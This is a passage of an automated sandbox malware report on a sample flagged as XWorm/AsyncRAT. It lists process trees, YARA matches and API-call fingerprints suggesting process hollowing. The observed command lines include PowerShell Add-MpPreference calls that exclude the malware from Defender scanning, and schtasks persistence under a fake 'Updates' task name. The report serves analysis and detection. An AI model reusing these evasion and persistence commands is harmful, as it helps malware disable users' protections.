                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp960E.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:05:31:02
                              Start date:31/10/2024
                              Path:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xf80000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Target ID:10
                              Start time:05:31:05
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Imagebase:0xa40000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 39%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:05:31:06
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:05:31:06
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:14
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpAD5E.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:16
                              Start time:05:31:08
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\RTUZKYTc.exe"
                              Imagebase:0x880000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              Has exited:true

                              Target ID:17
                              Start time:05:31:11
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:05:31:11
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:05:31:16
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe'
                              Imagebase:0x8e0000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:05:31:16
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:05:31:31
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xd30000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 39%, ReversingLabs
                              Has exited:true

                              Target ID:23
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmpE6A.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x2b0000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:05:31:33
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x470000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:05:31:40
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0xe70000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                              Has exited:true

                              Target ID:28
                              Start time:05:31:41
                              Start date:31/10/2024
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RTUZKYTc" /XML "C:\Users\user\AppData\Local\Temp\tmp2E66.tmp"
                              Imagebase:0x5a0000
                              File size:187'904 bytes
                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:05:31:41
                              Start date:31/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:05:31:42
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x2f0000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:05:31:42
                              Start date:31/10/2024
                              Path:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe"
                              Imagebase:0x710000
                              File size:575'496 bytes
                              MD5 hash:FF9E45D7326698F34526793BF1244811
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true

                                Execution Graph

                                Execution Coverage:10.6%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:3.3%
                                Total number of Nodes:90
                                Total number of Limit Nodes:4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b54adf97832790e4826355ce26bbbe26813bbeb1824ee67b5010753553f39744
                                • Instruction ID: 52f0c8fb73d8a9efd1672140042d910ca505fe8f60e369000dccaa30e418542d
                                • Opcode Fuzzy Hash: b54adf97832790e4826355ce26bbbe26813bbeb1824ee67b5010753553f39744
                                • Instruction Fuzzy Hash: 8DA1C774E00208DFDB05DFAAD994A9DBBB6FF88300F108469E809A7364DB355D86CF55
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 065ae161e9a36c969412793ddc702275e80853dae09b4b208a317f6b473bf4b7
                                • Instruction ID: 905c939d182e0ba1a2fdac1f150777f27addb4a94107c4f44a008b1e285d0fa5
                                • Opcode Fuzzy Hash: 065ae161e9a36c969412793ddc702275e80853dae09b4b208a317f6b473bf4b7
                                • Instruction Fuzzy Hash: 4FA1D674E00208DFDB05DFAAD994A9DBBB6FF88300F108469E809A7364DB355D86CF45
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6af436c27b289abc28f69299d40832e355a1d3ba2523bf117080b4642ba720ae
                                • Instruction ID: 945d075d30643fdac9455279b60c012acabf8983d8103229183646ff229eada9
                                • Opcode Fuzzy Hash: 6af436c27b289abc28f69299d40832e355a1d3ba2523bf117080b4642ba720ae
                                • Instruction Fuzzy Hash: 9B6185B4E01218DFEB18CFAAD985B9DBBF2BF88310F1481A9D809A7355DB359941CF50

                                Control-flow Graph (rendered image not included): function 17cd5d0-17cd7ad; calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and an internal routine at 17cd7b1.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 017CD65E
                                • GetCurrentThread.KERNEL32 ref: 017CD69B
                                • GetCurrentProcess.KERNEL32 ref: 017CD6D8
                                • GetCurrentThreadId.KERNEL32 ref: 017CD731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 355cfb2e91799d565bc9415247fa3c1173dd5744440f93755609646b42cfcb04
                                • Instruction ID: 4744f2adcf2502f7c1535adbaf45c822f133dbbc1543550e7e343e5dcdce0ade
                                • Opcode Fuzzy Hash: 355cfb2e91799d565bc9415247fa3c1173dd5744440f93755609646b42cfcb04
                                • Instruction Fuzzy Hash: DF5135B09006498FDB18DFA9D548BEEBBF1EF49304F20806DD419A7260D7385984CBA5

                                Control-flow Graph (rendered image not included): function 17cd5e0-17cd7ad; calls GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and an internal routine at 17cd7b1.
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 017CD65E
                                • GetCurrentThread.KERNEL32 ref: 017CD69B
                                • GetCurrentProcess.KERNEL32 ref: 017CD6D8
                                • GetCurrentThreadId.KERNEL32 ref: 017CD731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: cb3ec192c79225c163e7a01137c6a6fd68d09d69c0c3b83822419912ccfedbcb
                                • Instruction ID: ca0358877ab3d998f4b9d7cf967c58ffe265ec1e24cf08be435de90d4204d3ce
                                • Opcode Fuzzy Hash: cb3ec192c79225c163e7a01137c6a6fd68d09d69c0c3b83822419912ccfedbcb
                                • Instruction Fuzzy Hash: EB5124B09002498FDB18DFA9D548BEEFBF5FF48304F24846DD419A7260D7789984CBA5

                                Control-flow Graph (rendered image not included): function 786d76c-786dabd; calls CreateProcessA from block 786d907-786d9c1.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786D9AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ca0961dd9be36ee05fc30b3f5a92fd09ce14a63126d8db97fd8b91a18957b300
                                • Instruction ID: 5a759417ed3806e6478226af532e444fdcae09257c497599bcc9d1c78d19b7b7
                                • Opcode Fuzzy Hash: ca0961dd9be36ee05fc30b3f5a92fd09ce14a63126d8db97fd8b91a18957b300
                                • Instruction Fuzzy Hash: 14A169B1E0021ADFDF10CF69C849BEDBBB2AF54714F1485A9D808E7240DB749985CFA2

                                Control-flow Graph (rendered image not included): function 786d778-786dabd; calls CreateProcessA from block 786d907-786d9c1.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0786D9AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 30aff60e7c834478a3129ec76e69166601c16aece7535c4c61b6bd9048dfbe6d
                                • Instruction ID: 6a56ae65e8fb870e7ce7bf5409fb1deff8cab47d247cc342f455df3270508f04
                                • Opcode Fuzzy Hash: 30aff60e7c834478a3129ec76e69166601c16aece7535c4c61b6bd9048dfbe6d
                                • Instruction Fuzzy Hash: 4B9149B1E0021ADFDF24CF69C849BADBAB2AF54714F0485A9D809E7240DB749985CFA1

                                Control-flow Graph (rendered image not included): function 17cb344-17cb5c8; calls GetModuleHandleW from block 17cb580-17cb5ab and internal routines at 17c9db8, 17cb5e0, 17cb5d0, 17cb000, 17cb010, 17cb020 and 17cb030.
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 03b3d45aaae69680a3c2349455a18b8bb788d598e50f4d7207c5ef94f6a61e88
                                • Instruction ID: 6f15f35ffd74eaeef5307d465a0fe77478471ee01841d57a209fe7f4c7443197
                                • Opcode Fuzzy Hash: 03b3d45aaae69680a3c2349455a18b8bb788d598e50f4d7207c5ef94f6a61e88
                                • Instruction Fuzzy Hash: 69813070A00B058FD724DF69D44579ABBF5FF88740F00892EE48A9BA50D734E949CB90

                                Control-flow Graph (rendered image not included): function 17c4560-17c5e61; calls CreateActCtxA.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017C5DC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: cf3217ae79b7553108aaf1cedd08d3c3cb5009e4d0ef677c54eaa2128cb2e945
                                • Instruction ID: 412fe052cab099689fbd5435de8361e5ba67887e7a4c3ff6dbe1572234daa6d1
                                • Opcode Fuzzy Hash: cf3217ae79b7553108aaf1cedd08d3c3cb5009e4d0ef677c54eaa2128cb2e945
                                • Instruction Fuzzy Hash: B841FFB0D00719CBDB24DFA9C844B9EFBB5BF49704F20806ED418AB255DB756946CF90

                                Control-flow Graph (rendered image not included): function 17c5d0c-17c5e61; calls CreateActCtxA.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 017C5DC9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 4d35e8da92237a4e7f3fce543d9dcd1911b96f6599cfd45bda733db5f7f975d4
                                • Instruction ID: db2c699d5f455105010b16260e3e9dc6e3e919eddbf3363991ee922c19085d4e
                                • Opcode Fuzzy Hash: 4d35e8da92237a4e7f3fce543d9dcd1911b96f6599cfd45bda733db5f7f975d4
                                • Instruction Fuzzy Hash: A341FFB0D00319CADB25CFA9C888BDDBBB5BF49704F20806ED418AB255DB766946CF90

                                Control-flow Graph (rendered image not included): function 786d4e9-786d5c6; calls WriteProcessMemory from block 786d54e-786d58d.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0786D580
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: d0c6f186532de7a60425876a6b46af99bc6881a59d27887e5d395e63904fa03c
                                • Instruction ID: 37540deed6f6d5c62f171c803693a009b5fa0d6fe4f456b2b4aeedd29e71fe6a
                                • Opcode Fuzzy Hash: d0c6f186532de7a60425876a6b46af99bc6881a59d27887e5d395e63904fa03c
                                • Instruction Fuzzy Hash: D02144B19003099FDF10CFAAC885BEEBBF5FF48314F10842AE919A7240C7789945CBA0

                                Control-flow Graph (rendered image not included): function 786d4f0-786d5c6; calls WriteProcessMemory from block 786d54e-786d58d.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0786D580
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 30a49a66fb39d17fc86d87ac9c3958dd30514ca62e679b2a1a8f18b073f98861
                                • Instruction ID: fccc90eb583b6de8172cd2d9a14ff92c6476724a21dbb5498cb2eedfe38108e9
                                • Opcode Fuzzy Hash: 30a49a66fb39d17fc86d87ac9c3958dd30514ca62e679b2a1a8f18b073f98861
                                • Instruction Fuzzy Hash: 1E2136B19003599FCF10DFAAC885BEEBBF5FF48314F10842AE919A7240C7789944CBA0

                                Control-flow Graph (rendered image not included): function 786cf18-786cfe4; calls Wow64SetThreadContext from block 786cf85-786cfab.
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0786CF9E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 365f169ff07bc5fc74cc6c67a9fb57ef663ad47b7773388662afbf58502e1538
                                • Instruction ID: 650eee6f8356c792fd21e1152e8543ac9b7fbb5557f87b156dc74a7e69ca5dea
                                • Opcode Fuzzy Hash: 365f169ff07bc5fc74cc6c67a9fb57ef663ad47b7773388662afbf58502e1538
                                • Instruction Fuzzy Hash: 3A214AB19002099FDB10DFAAC4857EEBBF4EF89324F14842AD559A7240C778A545CBA0

                                Control-flow Graph (rendered image not included): function 786d5d9-786d6a6; calls ReadProcessMemory.
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0786D660
                                Memory Dump Source
                                • Source File: 00000000.00000002.2083719205.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7860000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: b2bd55d6dfe354de97028776b4a869bbef575b4719fbbf72b551580e4becd989
                                • Instruction ID: 2fd437f59d597324feb82a12f362f1ccf7ae092a39ffc19110dbfd17874d0183
                                • Opcode Fuzzy Hash: b2bd55d6dfe354de97028776b4a869bbef575b4719fbbf72b551580e4becd989
                                • Instruction Fuzzy Hash: 792114B1D00249DFDB10DFAAC885AEEFBF5FF48310F10842AE519A7250C7789945DBA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 017CD8AF
                                Memory Dump Source
                                • Source File: 00000000.00000002.2072664453.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_17c0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c4ff3749ec7f279a46b5f8eb416d417f8a2d7e8fe7baf2c47023b73d9c26f478
                                • Instruction ID: ee1f67d519f99e1d359c41066950d055b8a8756337b1a77118c876d0c73b852e
                                • Opcode Fuzzy Hash: c4ff3749ec7f279a46b5f8eb416d417f8a2d7e8fe7baf2c47023b73d9c26f478
                                • Instruction Fuzzy Hash: 3B21D4B59003089FDB10CFAAD984ADEFBF8FB48710F14841AE918A7350D378A944CFA5
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0786D660
